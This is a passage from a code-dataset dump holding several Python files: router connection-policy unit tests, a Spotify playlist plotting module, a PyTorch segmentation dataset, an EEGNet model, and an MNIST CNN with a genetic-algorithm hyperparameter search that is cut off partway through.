1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, None))\n\n def test_policy_app_conn_mgr_fail_by_hosts(self):\n stats = PolicyAppConnectionMgr(3, 2, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per host', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, None, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, None, 2))\n\n def test_policy_app_conn_mgr_fail_by_user_hosts(self):\n stats = PolicyAppConnectionMgr(3, 1, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 2)\n success = 'per user' in diags[0] or 'per user' in diags[1]\n self.assertTrue(success)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, 2))\n\n def test_policy_app_conn_mgr_update(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.update(3, 2, 2)\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_disconnect(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.disconnect(\"10.10.10.10:10000\", 'chuck', '10.10.10.10')\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_create_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(-3, 1, 2)\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_update_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(0, 0, 0)\n except PolicyError:\n denied = True\n self.assertFalse(denied, \"Should allow all zeros.\")\n try:\n stats.update(0, -1, 0)\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_larger_counts(self):\n stats = PolicyAppConnectionMgr(10000, 10000, 10000)\n diags = []\n for i in range(0, 10000):\n self.assertTrue(stats.can_connect('1.1.1.1:' + str(i), 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 0)\n self.assertFalse(stats.can_connect('1.1.1.1:10000', 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 3)\n self.assertTrue(stats.connections_active == 10000)\n self.assertTrue(stats.connections_approved == 10000)\n self.assertTrue(stats.connections_denied == 1)\n\n\nclass PolicyAliases(TestCase):\n\n #\n def test_AliasesRenameOwnVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"allowUnknownUser\": true,\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"remoteHosts\": \"*\",\n \"allowDynamicSource\": true,\n \"allowAnonymousSender\": true,\n \"sources\": \"$management, examples, q1\",\n \"targets\": \"$management, examples, q1\",\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Ruleset duplicates vhost and alias but condition not detected.\")\n\n #\n def test_SameAliasOnTwoVhosts(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"aliases\": \"a,b,c,d,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"doshormigas\",\n \"aliases\": \"i,h,g,f,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Rulesets duplicate same alias in two vhosts but condition not detected.\")\n\n #\n def test_AliasConflictsWithVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"conflict-with-vhost\",\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Ruleset alias names other vhost but condition not detected.\")\n\n #\n def test_AliasOperationalLookup(self):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n # For this test the test config defines vhost 'photoserver'.\n # This test accesses that vhost using the alias name 'antialias'.\n settingsname = policy.lookup_user('zeke', '192.168.100.5', 'antialias', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n upolicy = {}\n self.assertTrue(\n policy.lookup_settings('antialias', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n\nif __name__ == '__main__':\n unittest.main(main_module())\n","repo_name":"skupperproject/skupper-router","sub_path":"tests/router_policy_test.py","file_name":"router_policy_test.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"35866152579","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom typing import List, Tuple, Any, Counter as CounterT\nfrom collections import Counter\nimport toolz.curried as toolz\n\nfrom src.parsing.songs import parse_tracks\nfrom src.IO.genre_io import all_genres\n\n\ndef plot_years(counter: CounterT[int]) -> None:\n breakdown = {\n \"Year\": list(counter.keys()),\n \"Number of songs\": list(counter.values()),\n }\n\n sns.set_theme()\n axes = sns.barplot(\n data=breakdown,\n x=\"Year\",\n y=\"Number of songs\",\n )\n axes.set_title(\"Songs per year\")\n plt.show()\n\n\n# Show a bar plot of the number of tracks added to the playlist per year\nplot_songs_per_year = toolz.compose(\n plot_years, Counter, list, parse_tracks)\n\n\n@toolz.curry\ndef occurs_more_than(min: int, counter: Counter) -> dict:\n return toolz.valfilter(lambda x: x > min, counter)\n\n\ndef sort_counter(counter: Counter) -> List[Tuple[Any, int]]:\n return sorted(counter.items(), key=lambda pair: pair[1], reverse=True)\n\n\ndef plot_genres(sorted_counter: List[Tuple[str, int]]) -> None:\n breakdown = {\n \"Genre\": list(map(toolz.get(0), sorted_counter)),\n \"Occurences\": list(map(toolz.get(1), sorted_counter)),\n }\n sns.set_theme()\n axes = sns.barplot(\n data=breakdown,\n x=\"Genre\",\n y=\"Occurences\",\n )\n axes.set_title(\"Most common genres\")\n plt.show()\n\n\n# Show a bar plot of the number of songs per genre in the playlist\nplot_songs_per_genre = toolz.compose(\n plot_genres,\n sort_counter,\n occurs_more_than(10),\n Counter,\n list\n)\n","repo_name":"SMC242/spotify-wrapped-playlist","sub_path":"src/formatting/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70411709533","text":"from torch.utils.data import Dataset\nfrom torchvision.transforms.transforms import ToTensor\nimport torch\n\nimport albumentations as A\n\nimport numpy as np\n\nfrom PIL import Image\nimport cv2 as cv\n\nfrom typing import Dict, Optional, Union, List\nimport os\nimport json\n\nimport logging\n\nfrom .aug_tools import *\n\n__all__ = [\n \"cfg2datasets\",\n \"ImgMaskSet\",\n \"datasets2json_file\"\n]\n\n# Here implemented 'fit' that trains model.\n\nlog = logging.getLogger(__name__)\nimg2tensor = ToTensor()\n\n\nclass ImgMaskSet(Dataset):\n \"\"\"\n It's dataset that returns images, their masks and names. As well, it can return not transformed img.\n In img and mask dirs imgs and corresponding masks should be named the same.\n fgr and bgr trfms have not to change mask (it's can not be a flip, for instance)\n \"\"\"\n def __init__(self, log_name: str, img_dir_path: str, mask_dir_path: str, img_list: List[str],\n bgr_trfm, fgr_trfm, trfm, preproc, # add type of augmentation\n device: torch.device,):\n \"\"\"\n :param log_name: name that is used in log\n\n :param img_dir_path: path to directory where images are contained. in this directory all images are .jpeg\n :param mask_dir_path: path to directory where masks (images with deleted background) are contained.\n in this directory all images are .png\n :param img_list: specifies image names in image directory that should be used\n\n :param bgr_trfm: transformation of background, is not used during the test\n :param fgr_trfm: foreground augmentations, is not used during the test\n :param trfm: transformations to augment dataset, is not used during the test\n :param preproc: transformations that used during the test, it is applied after all other transformations\n\n :param device: device of images and masks\n \"\"\"\n\n self.log_name = log_name\n\n self.img_dir_path = img_dir_path\n self.mask_dir_path = mask_dir_path\n self.device = device\n\n self.img_list = [i[:-5] for i in img_list] # deleted extension .jpeg\n self.size = len(self.img_list)\n\n # augmentation\n self.bgr_trfm = bgr_trfm\n self.fgr_trfm = fgr_trfm\n self.trfm = trfm\n self.aug_flag = True # applying of augmentation depends on it\n\n # preprocessing\n self.preproc = preproc\n self.preproc_flag = True # applying of preprocessing depends on it\n\n # needed to return img in it original form, without preproc and augmentation\n self.return_original_img = False\n\n log.info(f\"Created {self.log_name} dataset: \\n\"\n f\"Size: {self.size} \\n\"\n f\"Device: {self.device} \\n\"\n f\"Path to image dir: {self.img_dir_path} \\n\"\n f\"Path to mask dir: {self.mask_dir_path}\")\n\n def __len__(self):\n return self.size\n\n def __getitem__(self, idx: int):\n\n img_name = self.img_list[idx]\n img_path = os.path.join(self.img_dir_path, img_name + \".jpeg\")\n mask_path = os.path.join(self.mask_dir_path, img_name + \".png\")\n\n # read img and mask\n original_img = cv.imread(img_path)\n if original_img is None:\n msg = f\"Wrong reading image {img_path}\"\n log.critical(msg)\n raise Exception(msg)\n\n original_img = cv.cvtColor(original_img, cv.COLOR_BGR2RGB) # convert to RGB format\n img = original_img.copy()\n\n with Image.open(mask_path) as mask_im:\n mask = np.array(mask_im.split()[-1]) # retrieve transparent mask\n\n # apply transformations\n if self.aug_flag:\n img, mask = self.apply_aug(img, mask)\n if self.preproc_flag:\n img, mask = self.apply_preproc(img, mask)\n\n # convert to tensor and transfer to device\n img_tensor = img2tensor(img).to(torch.float32).to(self.device)\n mask_tensor = img2tensor(mask).to(torch.float32).to(self.device)\n\n # return original image if it's needed\n if self.return_original_img:\n original_img = img2tensor(original_img).to(self.device)\n return img_name, img_tensor, mask_tensor, original_img\n else:\n return img_name, img_tensor, mask_tensor\n\n def apply_aug(self, img, mask):\n trfmd_bgr = self.bgr_trfm(image=img, mask=mask)[\"image\"]\n trfmd_fgr = self.fgr_trfm(image=img, mask=mask)[\"image\"]\n mask = mask.reshape([330, 330, 1])\n img = (trfmd_fgr * mask + trfmd_bgr * (1 - mask)).astype(\"uint8\")\n\n augmented = self.trfm(image=img, mask=mask)\n return augmented[\"image\"], augmented[\"mask\"]\n\n def apply_preproc(self, img, mask):\n preprocessed = self.preproc(image=img, mask=mask)\n return preprocessed[\"image\"], preprocessed[\"mask\"]\n\n def get_img_list(self):\n return [f\"{i}.jpeg\" for i in self.img_list]\n\n def img_list2file(self, path: str):\n with open(os.path.join(path, f\"{self.log_name}_dataset.json\"), \"w\") as fp:\n json.dump(\n {\n \"img_dir\": self.img_dir_path,\n \"mask_dir\": self.mask_dir_path,\n \"imgs_list\": self.get_img_list() # names saved with jpeg format\n },\n fp, indent=2)\n\n\ndef cfg2filter(cfg, ds_lists):\n \"\"\"\n Changes lists of datasets according to the filter\n :param cfg: consists of name, and private settings for each filter\n :param ds_lists: (datasets_lists) dictionary where key is the name\n of dataset and value is a list of imgs\n :return: changed ds_lists\n \"\"\"\n if cfg.name == \"pass\":\n pass\n else:\n msg = f\"Wrong filter \\\"{cfg.name}\\\"\"\n log.critical(msg)\n raise Exception(msg)\n\n return ds_lists\n\n\ndef cfg2datasets(cfg):\n \"\"\"\n :param cfg: dataset_cfg from main config\n consist of:\n 1) device - where to contain returned images\n 2) path - path to the file to read to get list of images for each dataset\n and path to the folder where it contains.\n 3) filter - manipulations with datasets to get new\n 4) bgr_trfm, fgr_trfm, trfm, preproc\n\n :return: dictionary: {dataset_name1: dataset1, ...}\n \"\"\"\n with open(cfg.path, \"r\") as f:\n file_dict = json.load(f)\n\n img_path = file_dict[\"img_path\"]\n mask_path = file_dict[\"mask_path\"]\n ds_lists = cfg2filter(cfg.filter, file_dict[\"dataset_lists\"])\n\n # converting configs to transformations\n bgr_trfm = cfg2trfm(cfg.bgr_trfm)\n fgr_trfm = cfg2trfm(cfg.fgr_trfm)\n trfm = cfg2trfm(cfg.trfm)\n preproc = cfg2trfm(cfg.preproc)\n\n # creating\n datasets = {}\n for ds_name in ds_lists:\n if ds_name == \"validation\":\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=A.Compose([]), fgr_trfm=A.Compose([]), trfm=A.Compose([]), preproc=preproc,\n device=torch.device(cfg.device)\n )\n else:\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=bgr_trfm, fgr_trfm=fgr_trfm, trfm=trfm, preproc=preproc,\n device=torch.device(cfg.device)\n )\n\n return datasets\n\n\ndef datasets2json_file(datasets: Dict[str, ImgMaskSet], save_path: str):\n key = [i for i in datasets.keys()][0]\n ds_dict = {\n \"img_path\": datasets[key].img_dir_path,\n \"mask_path\": datasets[key].mask_dir_path\n }\n\n for dataset_name, dataset in datasets.items():\n ds_dict[dataset_name] = dataset.get_img_list()\n\n with open(os.path.join(save_path, \"datasets.json\"), \"w\") as fp:\n json.dump(ds_dict, fp, indent=4)\n\n","repo_name":"ChocoL0rd/ImgSegmentation","sub_path":"new_code/tools/dataset_tools.py","file_name":"dataset_tools.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"329146403","text":"'''\n EEGNet pytorch network\n @param\n f1: first conv input channel\n f2: depthwise conv input channel\n fout: sparable conv input channel\n k1: first conv kernel size\n k2: depthwise conv kernel size\n k3: sparable conv kernel size\n do: dropout probability\n'''\n# Torch\nimport torch\nfrom torchvision import datasets, transforms\nimport torch.utils.data as Data\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\n\nclass EEGNet(torch.nn.Module):\n\t# Activation:\n # 0 -> ELU\n # 1 -> ReLU\n # 2 -> LeakyReLU\n def __init__(self, activation=0, f1=16, f2=32, fout=32, k1=51, k2=2, k3=15, do=0.25):\n super(EEGNet, self).__init__()\n if activation == 0:\n \tactivation_f = nn.ELU()\n elif activation == 1:\n \tactivation_f = nn.ReLU()\n else:\n \tactivation_f = nn.LeakyReLU()\n self.firstConv = nn.Sequential(\n nn.Conv2d(1, f1, kernel_size=(1, k1), stride=(1, 1), padding=(0, 25), bias=False),\n nn.BatchNorm2d(f1, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)\n )\n self.depthwiseConv = nn.Sequential(\n nn.Conv2d(f1, f2, kernel_size=(k2, 1), stride=(1, 1), groups=16, bias=False),\n nn.BatchNorm2d(f2, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n activation_f, \n nn.AvgPool2d(kernel_size=(1,4), stride=(1, 4), padding=0),\n nn.Dropout(p=do)\n )\n self.separableConv = nn.Sequential(\n nn.Conv2d(f2, fout, kernel_size=(1, k3), stride=(1, 1), padding=(0, 7), bias=False),\n nn.BatchNorm2d(fout, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n nn.ELU(),\n nn.AvgPool2d(kernel_size=(1,8), stride=(1, 8), padding=0),\n nn.Dropout(p=do)\n )\n self.classify = nn.Sequential(\n nn.Linear(in_features=fout*23, out_features=2, bias=True)\n )\n def forward(self, x):\n res = self.firstConv(x)\n res = self.depthwiseConv(res)\n res = self.separableConv(res)\n res = res.view(res.size(0), -1)\n res = self.classify(res)\n return res\n","repo_name":"sean85914/deep_learning_2019","sub_path":"Lab2/code/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30544926387","text":"\n# %%\n# imports\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n# for the random seed\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import Adagrad\nfrom tensorflow.keras.initializers import RandomUniform\nfrom time import time\nfrom random import randint\n\n#tf.debugging.set_log_device_placement(False)\n\ntry:\n\ttf.device('/device:GPU')\nexcept:\n\ttf.device('/device:CPU')\n\n# set the random seeds to get reproducible results\nprint(\"#\"*25, \" Code Start\", \"#\"*25,\"\\n\")\nnp_seed = np.random.seed(1)\ntf_seed = tf.random.set_seed(2)\n\n# Load data from https://www.openml.org/d/554\nprint(\"#\"*25, \" Load Data\", \"#\"*25,\"\\n\")\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\n\nX, y = X[:1000], y[:1000] # modified from 1000 to 5000\n# reduces the dataset which has 70000 images to a smaller set\n\n### deep learning is supervised \n#X = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\nX = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\n# Normalize\nX = X / 255. # 8bit 2**8 =256 \n\n# number of unique classes\nnum_classes = len(np.unique(y))\ny = y.astype(int)\nprint(\"#\"*25, \" Split Data\", \"#\"*25,\"\\n\")\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=1)\n\nnum_tot = y.shape[0] # number images in the dataset\nnum_train = y_train.shape[0] #number of images for the training phase\nnum_test = y_test.shape[0] #number of images for the test phase\n\nprint(\"#\"*25, \" One Hot Encoding\", \"#\"*25,\"\\n\")\ny_oh = np.zeros((num_tot, num_classes)) #generate a blank array to be filled with one-hotenc\ny_oh[range(num_tot), y] = 1 # replace \n\ny_oh_train = np.zeros((num_train, num_classes))\ny_oh_train[range(num_train), y_train] = 1\n\ny_oh_test = np.zeros((num_test, num_classes))\ny_oh_test[range(num_test), y_test] = 1\n\nprint(\"#\"*25, \" Questions Part I\", \"#\"*25,\"\\n\")\n#### Question 1 Code Answers\nfor num, y_value in enumerate(y):\n\tif num<10:\n\t\tprint(y_value, y_oh[num])\n\nax1 = plt.subplot(131) ### ( row=1 column=3 imgnumber=1 )\nax1.imshow(X[0]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax1.set_title( label = \"Y label = \"+ str( y[0] ))\n\nax2 = plt.subplot(132) ### ( row=1 column=1 imgnumber=2 )\nax2.imshow(X[10]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax2.set_title( label = \"Y label =\"+ str(y[10]))\n\nax3 = plt.subplot(133) ### ( row=1 column=1 imgnumber=3 )\nax3.imshow(X[20]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax3.set_title( label = \"Y label =\"+ str(y[20]))\nplt.show()\n# %%\nprint(\"#\"*25, \" Load CNN Class \", \"#\"*25,\"\\n\")\nclass MyCNN():\n\tdef __init__(self,\n\t\t\t\t X_train, y_oh_train, X_test, y_oh_test, y_test,\n\t\t\t\t activ_func = 'relu', last_layer_func = 'softmax' , ### Functions\n\t\t\t\t standard_kernel = (3, 3), input_shape=(28, 28, 1), ### CNN input\n\t\t\t\t num_classes = 10 , ### CNN output\n\t\t\t\t min_image_kernels = 16, dropout_rate = 0.1, ### CNN parameters\n\t\t\t\t lr = 0.02, decay = 1e-6, momentum = 0.9, ### Optimizer parameters\n\t\t\t\t batch_size = 1000, epochs=1000, ### Batch and Epoch\n\t\t\t\t loss='categorical_crossentropy', optimizer = \"SGD\"): ### loss type\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.activ_func = activ_func\n\t\tself.last_layer_func = last_layer_func\n\t\tself.standard_kernel = standard_kernel\n\t\tself.input_shape = input_shape\n\t\tself.num_classes = num_classes\n\t\tself.dropout_rate = dropout_rate\n\t\tself.mik = min_image_kernels\n\t\tself.lr = lr\n\t\tself.decay=decay\n\t\tself.momentum=momentum\n\t\tself.batch_size = batch_size\n\t\tself.epochs = epochs\n\t\t\n\t\tself.optimizer = optimizer\n\t\t#self.initializer = tf.keras.initializers.Zeros()\n\t\t### under dev. = initializer =RandomUniform(minval=0.9, maxval=1., seed=1)\n\n\tdef create_model(self):\n\n\t\tself.model = Sequential()\n\t\tself.model.add( Conv2D( self.mik , (3, 3), \n\t\t\t\t\t\t\t activation= self.activ_func, \n\t\t\t\t\t\t\t input_shape= self.input_shape\n\t\t\t\t\t\t\t ))\n\n\t\t### Conv layer 1 - getting overall details\n\t\t### the more add number of filters/kernel the better, usually your network is\n\t\t### the higher the kernel shape you pick large part information\n\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) )\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Conv2D(self.mik * 2 , (3, 3), \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### Conv layer 2 - getting more details\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) ) ### resuming information does not has weights\n\n\t\tself.model.add(Flatten())\n\n\t\tself.model.add(Dense( self.mik * 8, \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### first hidden layer of the fully connected\n\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Dense(self.num_classes, activation=self.activ_func\n\t\t\t\t\t\t\t\t))\n\n\t\tself.sgd = SGD(lr = self.lr, decay = self.decay, momentum = self.momentum, nesterov=True) #####\n\t\tself.rmsp = RMSprop(learning_rate = self.lr, rho=0.9, momentum=0.0, epsilon= self.decay, centered=False)\n\t\tself.adag =Adagrad(learning_rate=self.lr, initial_accumulator_value=0.1, epsilon=self.decay)\n\n\t\tif self.optimizer == \"SGD\":\n\t\t\toptim = self.sgd\n\t\telif self.optimizer == \"RMSProp\":\n\t\t\toptim = self.rmsp\n\t\telif self.optimizer == \"AdaGrad\":\n\t\t\toptim = self.adag\n\n\t\t# Compile the model\n\t\tself.model.compile(loss='categorical_crossentropy', optimizer=optim )\n\n\tdef train(self):\n\t\tstart_time = time()\n\t\tself.history = self.model.fit(self.X_train, \n\t\t\t\t\t\t\t\t\t self.y_oh_train, \n\t\t\t\t\t\t\t\t\t batch_size= self.batch_size, \n\t\t\t\t\t\t\t\t\t epochs=self.epochs, verbose = 0,\n\t\t\t\t\t\t\t\t\t validation_data = (self.X_test,self.y_oh_test)) ### \n\t\tend_time = time()\n\t\tself.train_time = end_time - start_time\n\n\tdef plot_train(self):\n\t\tplt.plot(self.history.history['loss'])\n\t\tplt.title('model loss')\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.show()\n\n\tdef test(self):\n\t\t# Evaluate performance\n\t\tself.test_loss = self.model.evaluate(self.X_test, self.y_oh_test, batch_size= self.batch_size)\n\n\t\tself.predictions_perc = self.model.predict(self.X_test, batch_size = self.batch_size)\n\t\tself.predictions_norm = np.argmax(self.predictions_perc, axis=1) \n\t\t# change encoding again\n\n\t\tself.accuracy = ( (self.predictions_norm == self.y_test).sum() / self.predictions_norm.shape[0])\n\t\tprint('Accuracy:', self.accuracy, \"\\n\")\n\nprint(\"#\"*25, \" Load Genetic Algorithm Class \", \"#\"*25,\"\\n\")\nclass Genetic_Algorithm():\n\t\n\tdef __init__(self, \n\t\tlr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\tX_train, y_oh_train, X_test, y_oh_test,y_test, \n\t\tnum_agents = 8): \n\t \n\t\t### Available Hyperparameters - lr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls\n\t\t### Input train and test data - X_train, y_oh_train, X_test, y_oh_test,y_test\n\t\t### Genetic Algorithm hyperparameters - num_agents = 8 \n\t\tself.lr_ls = lr_ls\n\t\tself.decay_ls = decay_ls\n\t\tself.batch_size_ls = batch_size_ls\n\t\tself.epoch_ls = epoch_ls\n\t\tself.dropout_ls = dropout_ls\n\t\tself.optimizer_ls = optimizer_ls\n\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tself.tt_gen_pos_06 = len(optimizer_ls)\n\n\t\tself.num_agents = num_agents\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.tested_policies = {}\n\n\t@staticmethod\n\tdef convert_policy_2_name(policy):\n\t\tpolicy_name = str(policy)[1:-1]\n\t\tpolicy_name = policy_name.replace(\", \", \"-\")\n\t\treturn policy_name\n\n\t@staticmethod\n\tdef convert_name_2_policy(policy_name):\n\t\tstr_ls = policy_name.split(\"-\")\n\t\tarray = np.array(str_ls).astype(int)\n\t\tpolicy = array.tolist()\n\t\treturn policy\n\n\t### under dev\n\tdef store_policy_result (self, result):\n\t\tpolicy = result[0]\n\t\t# result = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy, score]\n\n\t\tpolicy_name = self.convert_policy_2_name(policy)\n\n\t\tif policy_name not in self.tested_policies.keys():\n\t\t\tself.tested_policies[policy_name] = [result]\n\t\telse:\n\t\t\tpolicy_results = self.tested_policies[policy_name]\n\t\t\tpolicy_results.append(result)\n\t\t\tself.tested_policies[policy_name] = policy_results\n\t\t\t\t\t\t\t\t\t\t\t\t\n\tdef gen_random_policy(self):\n\t\t\n\t\tgen_pos_01 = randint(0, self.tt_gen_pos_01-1) ###learning_rate\n\t\tgen_pos_02 = randint(0, self.tt_gen_pos_02-1) ###decay_rate\n\t\tgen_pos_03 = randint(0, self.tt_gen_pos_03-1) ###batch_size\n\t\tgen_pos_04 = randint(0, self.tt_gen_pos_04-1) ###epochs\n\t\tgen_pos_05 = randint(0, self.tt_gen_pos_05-1) ###dropout_rate\n\t\tgen_pos_06 = randint(0, self.tt_gen_pos_06-1) ###dropout_rate\n\t\tpolicy = [gen_pos_01, gen_pos_02, gen_pos_03, gen_pos_04, gen_pos_05,gen_pos_06 ]\n\t\t### A policy is composed by index to retrieve values from:\n\t\t# self.lr_ls where policy[0] = lr\n\t\t# self.decay_ls where policy[1] = decay\n\t\t# self.batch_size_ls where policy[2] = batch_size\n\t\t# self.epoch_ls where policy[3] = epochs\n\t\t# self.dropout_ls where policy[4] = dropout_rate\n\t\treturn policy\n\t\n\tdef generate_single_agent (self, policy):\n\n\t\tlr_index = policy[0]\n\t\tdecay_index = policy[1]\n\t\tbs_index = policy[2]\n\t\tep_index = policy[3]\n\t\tdr_index = policy[4]\n\t\topt_index = policy[5]\n\t\t\n\t\tmodelCNN = MyCNN(self.X_train, self.y_oh_train, \n\t\t\t\t\t\t\tself.X_test, self.y_oh_test, self.y_test,\n\t\t\t\t\t\t\tdropout_rate = self.dropout_ls[dr_index], \n\t\t\t\t\t\t\tlr = self.lr_ls[lr_index], \n\t\t\t\t\t\t\tdecay = self.decay_ls[decay_index], \n\t\t\t\t\t\t\tbatch_size = self.batch_size_ls[bs_index], 